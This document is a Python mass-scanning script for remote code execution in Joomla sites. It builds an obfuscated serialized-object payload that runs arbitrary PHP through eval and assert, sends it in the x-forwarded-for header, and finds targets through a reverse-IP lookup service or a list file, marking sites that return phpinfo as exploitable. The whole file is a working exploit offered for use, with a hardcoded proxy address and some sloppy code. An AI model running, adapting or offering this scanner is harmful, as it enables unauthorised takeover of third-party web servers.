rce scanner

1. import sys
2. import re
3. import requests
4. import getopt
5. message = "--"
6. proxy = ("--proxy 91.194.77.112:65520")
7.  
8. def get_ip():
9.     ip = requests.get('http://icanhazip.com', proxies=proxy).content
10.     return ip
11. def get_url(url, user_agent):
12.    global message        
13.    headers = {
14.    #'User-Agent': user_agent  
15.    'x-forwarded-for': user_agent
16.    }
17.    response = None
18.    try:
19.      cookies = requests.get(url, timeout=15, headers=headers).cookies
20.  
21.      for _ in range(3):
22.        response = requests.get(url, timeout=15, headers=headers,cookies=cookies)  
23.    except Exception as ex:
24.      #print ex.message
25.      message = "Error: " + str(ex.message)
26.    if response:
27.      #print "got response"
28.      #print response.content
29.      return response.content
30.    return None
31.    
32. def php_str_noquotes(data):
33.   "Convert string to chr(xx).chr(xx) for use in php"
34.   encoded = ""
35.   for char in data:
36.         encoded += "chr({0}).".format(ord(char))
37.   return encoded[:-1]
38. def generate_payload(php_payload):
39.   php_payload = "eval({0})".format(php_str_noquotes(php_payload))
40.   terminate = '\xf0\xfd\xfd\xfd';
41.   exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
42.   injected_payload = "{};JFactory::getConfig();exit".format(php_payload)  
43.   exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
44.   exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
45.   return exploit_template
46. def get_site_list(domain):
47.    url = "http://viewdns.info/reverseip/?host=" + domain  + "&t=1"
48.    headers = {
49.    
50.    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'  
51.      
52.    }
53.  
54.    #print url
55.    try:
56.      response = requests.get(url, timeout=15, headers = headers)
57.      text =  response.content
58.      #print text
59.      sites = re.findall("<tr>\s+<td>(.*?)</td><td align=", text)
60.    except Exception as ex:
61.      print ("ex.message")
62.    return sites
63.    
64.  
65. def check_sites(site_list, pl, do_log, log_file):
66.    global message
67.    i = 1
68.    count = len(site_list)
69.    for site in site_list:
70.      site = site.strip()
71.      if(site.find("http://") == -1 ):
72.        host = "http://"+site
73.      else:
74.        host = site
75.      #print host
76.      resp = get_url(host ,pl)
77.      if resp != None:      
78.        lstr = ""
79.        m = re.search("phpinfo()", resp)
80.        if m:
81.         lstr = host + " exploitable"
82.        else :
83.          lstr =  host + " --"
84.      else:
85.        #print "error!"
86.        lstr = host + " " + message
87.        message = "--"
88.      print ("[") + str(i) + "/" + str(count) + "] "+ lstr
89.      i = i + 1
90.      if(do_log == True):
91.        log_file_handle = open(log_file, "a")
92.        log_file_handle.write(lstr+"\n")
93.        log_file_handle.close()
94.  
95. def usage():
96.    
97.    print ("Usage: "+sys.argv[0]+" "+"<options>")
98.    print ("Options:")
99.    print ("-d, --domain   domain for reverse lookup on viewdns.info")
100.    print ("-f, --file   file with site list to check")
101.    print ("-l, --log   save result to log file")
102.    print ("Example: "+sys.argv[0]+" --file domains.txt --log output.txt")
103.  
104.  
105.  
106.  
107. pl = generate_payload("phpinfo();")
108. #text = get_url(host, pl)
109.  
110. #write log?  
111. write_log = False
112. log_file = ""
113. domain = ""
114. read_file = ""
115. opts, args = getopt.getopt(sys.argv[1:], "f:d:l:", ["file=","domain=","log="]);
116.  
117. for opt, arg in opts:
118.    if opt in("-f", "--file"):
119.      read_file = arg
120.    elif opt in("-d", "--domain"):
121.      domain = arg
122.    elif opt in("-l", "--log"):
123.      log_file = arg
124.      write_log = True
125.  
126. if(domain and read_file):
127.    usage()
128.    exit()
129.  
130. if(domain == "" and read_file == ""):
131.    usage()
132.    exit()
133.  
134. if(write_log == True):
135.    
136.    fh = open(log_file, "w")
137.    fh.close()
138.  
139. #use file or get domains from viewdns.info
140.  
141. if(domain):
142.    sites = get_site_list(domain)
143.    #print sites
144.    print ("Total " +str(len(sites)) + " sites to check")
145.    check_sites(sites, pl, write_log, log_file)
146. elif(read_file):
147.    fh = open(read_file,"r")
148.    data = fh.readlines()
149.    fh.close()
150.    print ("Total " +str(len(data)) + " sites to check")
151.    check_sites(data, pl, write_log, log_file)